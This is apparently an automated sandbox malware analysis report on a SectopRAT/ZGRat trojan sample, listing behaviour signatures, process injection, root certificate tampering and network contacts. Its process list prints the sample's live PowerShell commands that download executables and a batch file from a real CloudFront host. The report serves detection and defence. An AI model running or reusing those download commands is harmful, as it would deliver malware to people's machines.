Malware Analysis Report

2025-01-02 05:48

Sample ID 240426-sj14gafa5v
Target file.exe
SHA256 7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9
Tags
sectoprat zgrat rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9

Threat Level: Known bad

The file file.exe was found to be: Known bad.

Malicious Activity Summary

sectoprat zgrat rat trojan

ZGRat

SectopRAT payload

Detect ZGRat V1

SectopRAT

Downloads MZ/PE file

Blocklisted process makes network request

Loads dropped DLL

Executes dropped EXE

Suspicious use of SetThreadContext

Program crash

Enumerates physical storage devices

Unsigned PE

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-26 15:10

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-26 15:10

Reported

2024-04-26 15:12

Platform

win7-20240221-en

Max time kernel

146s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

ZGRat

rat zgrat

Downloads MZ/PE file

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2020 set thread context of 2696 N/A C:\Users\Admin\AppData\Local\Temp\u1rw.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2696 set thread context of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1rw.3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1rw.3.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1rw.3.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1rw.2\run.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1rw.2\run.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1rw.2\run.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2184 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 2184 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 2184 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 2184 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 1616 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1616 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1616 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1616 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1616 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1616 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1616 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1616 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1616 wrote to memory of 2300 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 1616 wrote to memory of 2300 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 1616 wrote to memory of 2300 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 1616 wrote to memory of 2300 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 1616 wrote to memory of 484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1616 wrote to memory of 484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1616 wrote to memory of 484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1616 wrote to memory of 484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2300 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1rw.0.exe
PID 2300 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1rw.0.exe
PID 2300 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1rw.0.exe
PID 2300 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1rw.0.exe
PID 2300 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1rw.2\run.exe
PID 2300 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1rw.2\run.exe
PID 2300 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1rw.2\run.exe
PID 2300 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1rw.2\run.exe
PID 2300 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1rw.2\run.exe
PID 2300 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1rw.2\run.exe
PID 2300 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1rw.2\run.exe
PID 2020 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\u1rw.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2020 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\u1rw.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2020 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\u1rw.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2020 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\u1rw.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2300 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1rw.3.exe
PID 2300 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1rw.3.exe
PID 2300 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1rw.3.exe
PID 2300 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1rw.3.exe
PID 1616 wrote to memory of 2444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1616 wrote to memory of 2444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1616 wrote to memory of 2444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1616 wrote to memory of 2444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2020 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\u1rw.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\u1rw.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 2576 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\u1rw.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 2576 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\u1rw.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 2576 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\u1rw.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 2696 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2696 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2696 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2696 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2696 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2696 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nst204E.tmp\lood.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"

C:\Users\Admin\AppData\Local\Temp\i1.exe

i1.exe /SUB=2838 /str=one

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"

C:\Users\Admin\AppData\Local\Temp\u1rw.0.exe

"C:\Users\Admin\AppData\Local\Temp\u1rw.0.exe"

C:\Users\Admin\AppData\Local\Temp\u1rw.2\run.exe

"C:\Users\Admin\AppData\Local\Temp\u1rw.2\run.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Users\Admin\AppData\Local\Temp\u1rw.3.exe

"C:\Users\Admin\AppData\Local\Temp\u1rw.3.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456','i3.exe')"

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 d68kcn56pzfb4.cloudfront.net udp
NL 108.156.61.176:443 d68kcn56pzfb4.cloudfront.net tcp
NL 108.156.61.176:443 d68kcn56pzfb4.cloudfront.net tcp
NL 108.156.61.176:443 d68kcn56pzfb4.cloudfront.net tcp
DE 185.172.128.59:80 185.172.128.59 tcp
DE 185.172.128.90:80 185.172.128.90 tcp
NL 108.156.61.176:443 d68kcn56pzfb4.cloudfront.net tcp
